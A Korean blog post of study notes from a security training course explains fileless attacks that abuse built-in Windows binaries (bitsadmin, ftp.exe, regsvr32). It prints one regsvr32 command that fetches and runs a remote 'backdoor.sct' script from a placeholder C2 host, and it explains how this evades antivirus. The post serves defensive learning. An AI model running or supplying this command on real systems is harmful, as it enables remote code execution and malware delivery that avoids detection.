작은 메모장

파일리스(Fileless) 공격 LoL 바이너리 본문

KISA 사이버 보안 훈련/스피어피싱 대응 기본

파일리스(Fileless) 공격 LoL 바이너리

으앙내눈 2023. 5. 17. 21:57

LoL은 파일리스 공격을 위해 시행하는 방법

LoL Bins는 이런 공격의 도구가 되는 빌트 인터프리터

오늘날의 공격 양상은 전부 이런식으로 진행됨

이를 이용한 몇 가지 예시...

 

Bitsadmin.exe

Background Intelligent Transfer Service (BITS),

원격 호스트로부터 대용량 파일을 전송받을 때 사용

윈도우 업데이트가 이 서비스를 활용

공격자는 이를 이용해 ADS에 은닉한 파일 실행, 지정한 파일 실행, 파일 다운로드 및 복사에 활용

 

ftp.exe

File Transport protocol(FTP)

윈도우에서 기본으로 제공하는 FTP 클라이언트 프로그램

공격자는 이를 지정된 프로그램을 실행하는 용도로 사용

 

regsvr32

DLL 파일을 서비스 등록에 사용하는 빌트인 명령어

공격자는 각종 옵션을 활용하여 악성코드를 서비스로 등록

regsvr32 /s /n /u /i:http://c2/backdoor.sct scrobj.dll

위 코드는 다음의 과정을 거침

1. 기본적으로, regsvr32는 공격자의 L2 서버에서 backdoor.sct 스크립트 파일을 가져옴

2. 가져온 스크립트 파일로 scrobj.dll을 실행

3. scrobj.dll은 내부의 VB스트립트 혹은 V스크립트 실행 함수로 전달받은  스크립트 파일을 메모리에 적재

이 과정에서, 디스크 터치, 파일 쓰기는 전혀 없었으며 악의적인 프로그램 또한 다운되지 않았음, 스크립트 또한 난독화

=> 안티바이러스 프로그램 감지 어려움

4. 메모리에 올라간 스크립트 파일이 또 다른 LoL Bins 혹은 Powershell같은 프로그램을 이용해 위 과정을 반복